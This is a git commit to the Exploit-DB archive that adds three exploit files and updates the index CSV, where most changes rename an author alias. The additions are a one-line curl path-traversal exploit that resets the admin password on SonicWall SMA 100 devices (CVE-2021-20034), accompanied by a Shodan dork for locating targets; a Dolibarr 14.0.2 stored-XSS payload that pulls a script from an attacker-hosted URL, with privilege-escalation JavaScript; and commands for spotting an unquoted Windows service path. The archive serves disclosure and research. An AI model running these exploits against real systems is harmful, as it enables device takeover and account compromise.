DB: 2021-10-21

3 changes to exploits/shellcodes

Macro Expert 4.7 - Unquoted Service Path

AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure

PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion

xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion

InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion

CMSbright - 'id_rub_page' SQL Injection

ParsBlogger - 'blog.asp' SQL Injection

Blog System 1.x - 'note' SQL Injection

PHP Joke Site Software - 'sbjoke_id' SQL Injection

PHP Classifieds ADS - 'sid' Blind SQL Injection

Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection

Storyteller CMS - 'var' Local File Inclusion

MyPhpAuction 2010 - 'id' SQL Injection

PHP Lowbids - 'viewfaqs.php' Blind SQL Injection

BetMore Site Suite 4 - 'bid' Blind SQL Injection

PHP auctions - 'viewfaqs.php' Blind SQL Injection

PHP Coupon Script 6.0 - 'bus' Blind SQL Injection
PHP Link Directory Software - 'sbcat_id' SQL Injection
PHP Classified ads software - 'cid' Blind SQL Injection
PHP Script Directory Software - 'sbcat_id' SQL Injection
PHP Link Directory Software - 'sbcat_id' SQL Injection
PHP Classified ads software - 'cid' Blind SQL Injection
PHP Script Directory Software - 'sbcat_id' SQL Injection

Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion

Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal

easyGB 2.1.1 - 'index.php' Local File Inclusion

PHPAuctions - 'viewfaqs.php' SQL Injection
SonicWall SMA 10.2.1.0-17sv - Password Reset
Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
This commit is contained in:
Offensive Security 2021-10-21 05:02:11 +00:00
parent b17b7fe4b2
commit 2ee235ed78
4 changed files with 122 additions and 23 deletions

View file

@ -0,0 +1,12 @@
# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
# Description: Overwrite the persistent database, resulting in password reset on reboot.
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
# Date: 10/19/2021
# Exploit Author: Jacob Baines (@Junior_Baines)
# Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
# Vendor Homepage: https://www.sonicwall.com/
# Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
# Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
# CVE : CVE-2021-20034
curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"

View file

@ -0,0 +1,48 @@
# Exploit Title: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
# Date: 18/10/2021
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://github.com/Dolibarr
# Tested on: Ubuntu, LAAMP
# Vendor: Dolibarr
# Version: v14.0.2
# Exploit Description:
# Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the "message" box.
# Instructions:
#1. Insert this payload in the message box when creating a ticket: "><span onbeforecopy="let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);" contenteditable>test</span>
#
#2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference.
#NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user.
#
#3.Once an administrator user copies the text within the ticket the attack will launch.
function read_body(xhr) {
var data = xhr.responseXML;
var tokenizedUrl = data.getElementsByClassName("reposition commonlink")[0].href;
console.log(tokenizedUrl);
return tokenizedUrl;
}
function escalatePrivs() {
var url = read_body(xhr);
var http = new XMLHttpRequest();
http.open('GET', url);
http.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
return;
}
};
http.send(null);
}
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
read_body(xhr);
escalatePrivs(xhr);
}
}
xhr.open('GET', '/dolibarr/htdocs/user/perms.php?id=2', true);

View file

@ -0,0 +1,36 @@
# Exploit Title: Macro Expert 4.7 - Unquoted Service Path
# Exploit Author: Mert DAŞ
# Version: 3.11.8
# Date: 20.10.2021
# Vendor Homepage: http://www.macro-expert.com/
# Tested on: Windows 10
C:\Users\Mert>sc qc "Macro Expert"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Macro Expert
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\program files (x86)\grasssoft\macro
expert\MacroService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Macro Expert
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
---------------------------------------------
Or:
-------------------------
C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.

View file

@ -11349,6 +11349,7 @@ id,file,description,date,author,type,platform,port
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -20047,7 +20048,7 @@ id,file,description,date,author,type,platform,port
3455,exploits/php/webapps/3455.html,"JobSitePro 1.0 - 'search.php' SQL Injection",1970-01-01,ajann,webapps,php,
3456,exploits/php/webapps/3456.pl,"Top Auction 1.0 - 'viewcat.php' SQL Injection",1970-01-01,ajann,webapps,php,
3457,exploits/php/webapps/3457.pl,"SonicMailer Pro 3.2.3 - 'index.php' SQL Injection",1970-01-01,ajann,webapps,php,
3458,exploits/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",1970-01-01,"BorN To K!LL",webapps,php,
3458,exploits/php/webapps/3458.txt,"AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure",1970-01-01,h4ck3r,webapps,php,
3459,exploits/php/webapps/3459.txt,"cPanel 10.9.x - 'Fantastico' Local File Inclusion",1970-01-01,"cyb3rt & 020",webapps,php,
3465,exploits/php/webapps/3465.txt,"OES (Open Educational System) 0.1beta - Remote File Inclusion",1970-01-01,K-159,webapps,php,
3466,exploits/asp/webapps/3466.txt,"BP Blog 7.0 - 'layout' SQL Injection",1970-01-01,BeyazKurt,webapps,asp,
@ -20638,7 +20639,7 @@ id,file,description,date,author,type,platform,port
4443,exploits/php/webapps/4443.txt,"ClanSphere 2007.4 - 'cat_id' SQL Injection",1970-01-01,IHTeam,webapps,php,
4444,exploits/php/webapps/4444.txt,"Black Lily 2007 - 'products.php?class' SQL Injection",1970-01-01,VerY-SecReT,webapps,php,
4446,exploits/php/webapps/4446.txt,"Wordsmith 1.1b - 'config.inc.php?_path' Remote File Inclusion",1970-01-01,ShockShadow,webapps,php,
4447,exploits/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
4447,exploits/php/webapps/4447.txt,"PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
4448,exploits/php/webapps/4448.txt,"helplink 0.1.0 - 'show.php' Remote File Inclusion",1970-01-01,GoLd_M,webapps,php,
4449,exploits/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - SQL Injection",1970-01-01,IHTeam,webapps,php,
4451,exploits/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusions",1970-01-01,BiNgZa,webapps,php,
@ -20680,7 +20681,7 @@ id,file,description,date,author,type,platform,port
4499,exploits/php/webapps/4499.txt,"Joomla! Component mosmedialite451 - Remote File Inclusion",1970-01-01,k1n9k0ng,webapps,php,
4500,exploits/php/webapps/4500.txt,"TorrentTrader Classic 1.07 - Multiple Vulnerabilities",1970-01-01,"HACKERS PAL",webapps,php,
4501,exploits/php/webapps/4501.php,"PHP Homepage M 1.0 - 'galerie.php' SQL Injection",1970-01-01,"[PHCN] Mahjong",webapps,php,
4502,exploits/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
4502,exploits/php/webapps/4502.txt,"xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion",1970-01-01,h4ck3r,webapps,php,
4503,exploits/php/webapps/4503.txt,"LiveAlbum 0.9.0 - 'common.php' Remote File Inclusion",1970-01-01,S.W.A.T.,webapps,php,
4504,exploits/php/webapps/4504.txt,"Softbiz Jobs & Recruitment - SQL Injection",1970-01-01,"Khashayar Fereidani",webapps,php,
4505,exploits/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution",1970-01-01,BlackHawk,webapps,php,
@ -20716,7 +20717,7 @@ id,file,description,date,author,type,platform,port
4554,exploits/php/webapps/4554.txt,"Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion",1970-01-01,BiNgZa,webapps,php,
4555,exploits/php/webapps/4555.txt,"TOWeLS 0.1 - 'scripture.php' Remote File Inclusion",1970-01-01,GoLd_M,webapps,php,
4557,exploits/php/webapps/4557.txt,"Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities",1970-01-01,DarkFig,webapps,php,
4558,exploits/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
4558,exploits/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
4561,exploits/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",1970-01-01,KiNgOfThEwOrLd,webapps,php,
4562,exploits/php/webapps/4562.txt,"Flatnuke 3 - Remote Cookie Manipulation / Privilege Escalation",1970-01-01,KiNgOfThEwOrLd,webapps,php,
4563,exploits/php/webapps/4563.txt,"PHP-Nuke platinum 7.6.b.5 - Remote File Inclusion",1970-01-01,BiNgZa,webapps,php,
@ -22060,7 +22061,7 @@ id,file,description,date,author,type,platform,port
6339,exploits/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",1970-01-01,InjEctOr5,webapps,php,
6341,exploits/php/webapps/6341.txt,"WeBid 0.5.4 - 'item.php' SQL Injection",1970-01-01,Stack,webapps,php,
6342,exploits/php/webapps/6342.txt,"EasyClassifields 3.0 - 'go' SQL Injection",1970-01-01,e.wiZz!,webapps,php,
6343,exploits/php/webapps/6343.txt,"CMSbright - 'id_rub_page' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
6343,exploits/php/webapps/6343.txt,"CMSbright - 'id_rub_page' SQL Injection",1970-01-01,h4ck3r,webapps,php,
6344,exploits/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",1970-01-01,Stack,webapps,php,
6346,exploits/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection",1970-01-01,"Virangar Security",webapps,php,
6347,exploits/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection",1970-01-01,MustLive,webapps,php,
@ -22759,7 +22760,7 @@ id,file,description,date,author,type,platform,port
40987,exploits/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",1970-01-01,Adam,webapps,php,
7237,exploits/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",1970-01-01,otmorozok428,webapps,php,
7238,exploits/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Blind SQL Injection",1970-01-01,XaDoS,webapps,php,
7239,exploits/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
7239,exploits/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",1970-01-01,h4ck3r,webapps,php,
7240,exploits/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",1970-01-01,b3hz4d,webapps,php,
7241,exploits/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",1970-01-01,"CWH Underground",webapps,php,
7242,exploits/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",1970-01-01,Bl@ckbe@rD,webapps,php,
@ -24991,7 +24992,7 @@ id,file,description,date,author,type,platform,port
11212,exploits/asp/webapps/11212.txt,"eWebeditor - Directory Traversal",1970-01-01,anonymous,webapps,asp,
11213,exploits/php/webapps/11213.txt,"Joomla! Component com_book - SQL Injection",1970-01-01,Evil-Cod3r,webapps,php,
11215,exploits/windows/webapps/11215.txt,"SHOUTcast Server 1.9.8/Win32 - Cross-Site Request Forgery",1970-01-01,cp77fk4r,webapps,windows,
11216,exploits/php/webapps/11216.txt,"Blog System 1.x - 'note' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
11216,exploits/php/webapps/11216.txt,"Blog System 1.x - 'note' SQL Injection",1970-01-01,h4ck3r,webapps,php,
11218,exploits/multiple/webapps/11218.txt,"jQuery Uploadify 2.1.0 - Arbitrary File Upload",1970-01-01,k4cp3r/Ablus,webapps,multiple,
11222,exploits/php/webapps/11222.txt,"Joomla! Component com_gameserver - SQL Injection",1970-01-01,B-HUNT3|2,webapps,php,
11223,exploits/php/webapps/11223.txt,"Joomla! Component com_avosbillets - SQL Injection",1970-01-01,snakespc,webapps,php,
@ -26586,14 +26587,14 @@ id,file,description,date,author,type,platform,port
14854,exploits/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass",1970-01-01,Abysssec,webapps,php,
14851,exploits/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion",1970-01-01,Andre_Corleone,webapps,php,
14870,exploits/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",1970-01-01,Abysssec,webapps,asp,
14860,exploits/php/webapps/14860.txt,"PHP Joke Site Software - 'sbjoke_id' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
14860,exploits/php/webapps/14860.txt,"PHP Joke Site Software - 'sbjoke_id' SQL Injection",1970-01-01,h4ck3r,webapps,php,
14867,exploits/php/webapps/14867.txt,"vbShout 5.2.2 - Local/Remote File Inclusion",1970-01-01,fred777,webapps,php,
14876,exploits/php/webapps/14876.txt,"Shop a la Cart - Multiple Vulnerabilities",1970-01-01,Ariko-Security,webapps,php,
14879,exploits/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",1970-01-01,Abysssec,webapps,asp,
14884,exploits/php/webapps/14884.txt,"smbind 0.4.7 - SQL Injection",1970-01-01,r00t,webapps,php,
14887,exploits/php/webapps/14887.txt,"SyndeoCMS 2.8.02 - Multiple Vulnerabilities (1)",1970-01-01,Abysssec,webapps,php,
14890,exploits/php/webapps/14890.py,"mBlogger 1.0.04 - 'addcomment.php' Persistent Cross-Site Scripting",1970-01-01,"Ptrace Security",webapps,php,
14891,exploits/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
14891,exploits/php/webapps/14891.txt,"PHP Classifieds ADS - 'sid' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
14893,exploits/php/webapps/14893.txt,"PHP Classifieds 7.3 - Remote File Inclusion",1970-01-01,alsa7r,webapps,php,
14894,exploits/php/webapps/14894.py,"A-Blog 2.0 - '/sources/search.php' SQL Injection",1970-01-01,"Ptrace Security",webapps,php,
14896,exploits/php/webapps/14896.txt,"Joomla! Component iJoomla! Magazine 3.0.1 - Remote File Inclusion",1970-01-01,LoSt.HaCkEr,webapps,php,
@ -26603,7 +26604,7 @@ id,file,description,date,author,type,platform,port
14902,exploits/php/webapps/14902.txt,"Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injections",1970-01-01,Solidmedia,webapps,php,
14913,exploits/asp/webapps/14913.txt,"DMXReady Members Area Manager - Persistent Cross-Site Scripting",1970-01-01,"L0rd CrusAd3r",webapps,asp,
14908,exploits/asp/webapps/14908.txt,"DMXready Polling Booth Manager - SQL Injection",1970-01-01,"L0rd CrusAd3r",webapps,asp,
14910,exploits/php/webapps/14910.txt,"Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
14910,exploits/php/webapps/14910.txt,"Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
14911,exploits/php/webapps/14911.sh,"Joomla! Component Gantry 3.0.10 - Blind SQL Injection",1970-01-01,jdc,webapps,php,
14932,exploits/windows/webapps/14932.py,"ColdCalendar 2.06 - SQL Injection",1970-01-01,mr_me,webapps,windows,
14914,exploits/asp/webapps/14914.txt,"Micronetsoft RV Dealer Website - SQL Injection",1970-01-01,"L0rd CrusAd3r",webapps,asp,
@ -26637,7 +26638,7 @@ id,file,description,date,author,type,platform,port
14989,exploits/php/webapps/14989.txt,"osDate - 'uploadvideos.php' Arbitrary File Upload",1970-01-01,Xa7m3d,webapps,php,
14991,exploits/asp/webapps/14991.txt,"Luftguitar CMS - Upload Arbitrary File",1970-01-01,Abysssec,webapps,asp,
14995,exploits/php/webapps/14995.txt,"Joomla! Component com_mtree 2.1.5 - Arbitrary File Upload",1970-01-01,jdc,webapps,php,
14996,exploits/php/webapps/14996.txt,"Storyteller CMS - 'var' Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
14996,exploits/php/webapps/14996.txt,"Storyteller CMS - 'var' Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
14997,exploits/php/webapps/14997.txt,"UCenter Home 2.0 - SQL Injection",1970-01-01,KnocKout,webapps,php,
14998,exploits/php/webapps/14998.txt,"Joomla! Component JGen 0.9.33 - SQL Injection",1970-01-01,**RoAd_KiLlEr**,webapps,php,
14999,exploits/asp/webapps/14999.txt,"freediscussionforums 1.0 - Multiple Vulnerabilities",1970-01-01,Abysssec,webapps,asp,
@ -26698,7 +26699,7 @@ id,file,description,date,author,type,platform,port
15151,exploits/php/webapps/15151.txt,"Webspell 4.2.1 - 'asearch.php' SQL Injection",1970-01-01,"silent vapor",webapps,php,
15152,exploits/php/webapps/15152.py,"Webspell wCMS-Clanscript4.01.02net - static Blind SQL Injection",1970-01-01,"Easy Laster",webapps,php,
15153,exploits/php/webapps/15153.txt,"Webspell 4.x - safe_query Bypass",1970-01-01,"silent vapor",webapps,php,
15154,exploits/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
15154,exploits/php/webapps/15154.txt,"MyPhpAuction 2010 - 'id' SQL Injection",1970-01-01,h4ck3r,webapps,php,
15160,exploits/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",1970-01-01,Abysssec,webapps,asp,
15162,exploits/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",1970-01-01,"Easy Laster",webapps,php,
15163,exploits/php/webapps/15163.rb,"Joomla! Component JE Directory 1.0 - SQL Injection",1970-01-01,"Easy Laster",webapps,php,
@ -27079,13 +27080,13 @@ id,file,description,date,author,type,platform,port
15981,exploits/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",1970-01-01,"Saif El-Sherei",webapps,php,
15979,exploits/php/webapps/15979.txt,"Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay",1970-01-01,"Jeff Channell",webapps,php,
15987,exploits/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",1970-01-01,"Spencer McIntyre",webapps,cgi,
16020,exploits/php/webapps/16020.txt,"PHP Lowbids - 'viewfaqs.php' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
16020,exploits/php/webapps/16020.txt,"PHP Lowbids - 'viewfaqs.php' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
15989,exploits/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",1970-01-01,"Salvatore Fresta",webapps,php,
15993,exploits/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",1970-01-01,Or4nG.M4N,webapps,php,
15995,exploits/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",1970-01-01,Saif,webapps,php,
15996,exploits/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",1970-01-01,"Patrick de Brouwer",webapps,php,
15997,exploits/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",1970-01-01,mr_me,webapps,jsp,
15999,exploits/php/webapps/15999.txt,"BetMore Site Suite 4 - 'bid' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
15999,exploits/php/webapps/15999.txt,"BetMore Site Suite 4 - 'bid' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
16000,exploits/php/webapps/16000.txt,"Seo Panel 2.2.0 - Cookie-Rendered Persistent Cross-Site Scripting",1970-01-01,"Mark Stanislav",webapps,php,
16001,exploits/php/webapps/16001.txt,"Joomla! Component com_people 1.0.0 - Local File Inclusion",1970-01-01,ALTBTA,webapps,php,
16003,exploits/php/webapps/16003.txt,"AWBS 2.9.2 - 'cart.php' Blind SQL Injection",1970-01-01,ShivX,webapps,php,
@ -27097,11 +27098,11 @@ id,file,description,date,author,type,platform,port
17209,exploits/php/webapps/17209.txt,"SoftMP3 - SQL Injection",1970-01-01,mArTi,webapps,php,
16016,exploits/php/webapps/16016.txt,"Simploo CMS 1.7.1 - PHP Code Execution",1970-01-01,"David Vieira-Kurz",webapps,php,
16039,exploits/php/webapps/16039.txt,"Joomla! Component com_b2portfolio 1.0.0 - Multiple SQL Injections",1970-01-01,"Salvatore Fresta",webapps,php,
16018,exploits/php/webapps/16018.txt,"PHP auctions - 'viewfaqs.php' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
16018,exploits/php/webapps/16018.txt,"PHP auctions - 'viewfaqs.php' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
16019,exploits/php/webapps/16019.txt,"phpCMS 2008 - SQL Injection",1970-01-01,R3d-D3V!L,webapps,php,
16027,exploits/php/webapps/16027.txt,"phpCMS 9.0 - Blind SQL Injection",1970-01-01,eidelweiss,webapps,php,
16028,exploits/php/webapps/16028.txt,"cultbooking 2.0.4 - Multiple Vulnerabilities",1970-01-01,LiquidWorm,webapps,php,
16034,exploits/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
16034,exploits/php/webapps/16034.txt,"PHP Coupon Script 6.0 - 'bus' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
16037,exploits/php/webapps/16037.html,"PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)",1970-01-01,AtT4CKxT3rR0r1ST,webapps,php,
16060,exploits/php/webapps/16060.txt,"comercioplus 5.6 - Multiple Vulnerabilities",1970-01-01,"Daniel Godoy",webapps,php,
16044,exploits/php/webapps/16044.txt,"ab Web CMS 1.35 - Multiple Vulnerabilities",1970-01-01,"Dr.0rYX & Cr3W-DZ",webapps,php,
@ -27113,9 +27114,9 @@ id,file,description,date,author,type,platform,port
16054,exploits/windows/webapps/16054.txt,"sap crystal report server 2008 - Directory Traversal",1970-01-01,"Dmitriy Chastuhin",webapps,windows,
16058,exploits/php/webapps/16058.txt,"MultiPowUpload 2.1 - Arbitrary File Upload",1970-01-01,DIES3L,webapps,php,
16059,exploits/php/webapps/16059.txt,"Xnova Legacies 2009.2 - Cross-Site Request Forgery",1970-01-01,"Xploit A Day",webapps,php,
16061,exploits/php/webapps/16061.txt,"PHP Link Directory Software - 'sbcat_id' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
16062,exploits/php/webapps/16062.txt,"PHP Classified ads software - 'cid' Blind SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
16069,exploits/php/webapps/16069.txt,"PHP Script Directory Software - 'sbcat_id' SQL Injection",1970-01-01,"BorN To K!LL",webapps,php,
16061,exploits/php/webapps/16061.txt,"PHP Link Directory Software - 'sbcat_id' SQL Injection",1970-01-01,h4ck3r,webapps,php,
16062,exploits/php/webapps/16062.txt,"PHP Classified ads software - 'cid' Blind SQL Injection",1970-01-01,h4ck3r,webapps,php,
16069,exploits/php/webapps/16069.txt,"PHP Script Directory Software - 'sbcat_id' SQL Injection",1970-01-01,h4ck3r,webapps,php,
16074,exploits/php/webapps/16074.txt,"MultiCMS - Local File Inclusion",1970-01-01,R3VAN_BASTARD,webapps,php,
16076,exploits/php/webapps/16076.txt,"vBSEO 3.2.2/3.5.2 - Persistent Cross-Site Scripting via LinkBacks",1970-01-01,MaXe,webapps,php,
16077,exploits/php/webapps/16077.txt,"vBSEO Sitemap 2.5/3.0 - Multiple Vulnerabilities",1970-01-01,MaXe,webapps,php,
@ -33412,12 +33413,12 @@ id,file,description,date,author,type,platform,port
29731,exploits/php/webapps/29731.txt,"SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php?root_dir' Remote File Inclusion",1970-01-01,"Hasadya Raed",webapps,php,
29733,exploits/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",1970-01-01,"Sojobo dev team",webapps,php,80
29736,exploits/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",1970-01-01,"RaeD Hasadya",webapps,php,
29737,exploits/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
29737,exploits/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
29742,exploits/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",1970-01-01,"Immerda Project Group",webapps,php,
29744,exploits/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",1970-01-01,"Abdus Samad",webapps,php,
29745,exploits/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",1970-01-01,"Moritz Naumann",webapps,php,
29747,exploits/php/webapps/29747.txt,"DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting",1970-01-01,Mandr4ke,webapps,php,
29748,exploits/php/webapps/29748.txt,"Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal",1970-01-01,"BorN To K!LL",webapps,php,
29748,exploits/php/webapps/29748.txt,"Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal",1970-01-01,h4ck3r,webapps,php,
29750,exploits/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",1970-01-01,rgod,webapps,php,
29751,exploits/php/webapps/29751.php,"phpStats 0.1.9 - 'PHP-Stats-options.php' Remote Code Execution",1970-01-01,rgod,webapps,php,
29754,exploits/php/webapps/29754.html,"WordPress Core < 2.1.2 - 'PHP_Self' Cross-Site Scripting",1970-01-01,"Alexander Concha",webapps,php,
@ -34021,7 +34022,7 @@ id,file,description,date,author,type,platform,port
30737,exploits/php/webapps/30737.txt,"Galmeta Post 0.2 - 'Upload_Config.php' Remote File Inclusion",1970-01-01,"arfis project",webapps,php,
30738,exploits/php/webapps/30738.txt,"E-Vendejo 0.2 - 'Articles.php' SQL Injection",1970-01-01,r00t,webapps,php,
30739,exploits/php/webapps/30739.txt,"JLMForo System - 'Buscado.php' Cross-Site Scripting",1970-01-01,"Jose Luis Gongora Fernandez",webapps,php,
30741,exploits/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",1970-01-01,"BorN To K!LL",webapps,php,
30741,exploits/php/webapps/30741.txt,"easyGB 2.1.1 - 'index.php' Local File Inclusion",1970-01-01,h4ck3r,webapps,php,
30743,exploits/asp/webapps/30743.txt,"i-Gallery 3.4 - 'igallery.asp' Remote Information Disclosure",1970-01-01,hackerbinhphuoc,webapps,asp,
30745,exploits/php/webapps/30745.html,"Weblord.it MS-TopSites - Unauthorized Access / HTML Injection",1970-01-01,0x90,webapps,php,
30746,exploits/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",1970-01-01,"Giuseppe Gottardi",webapps,php,
@ -36691,7 +36692,7 @@ id,file,description,date,author,type,platform,port
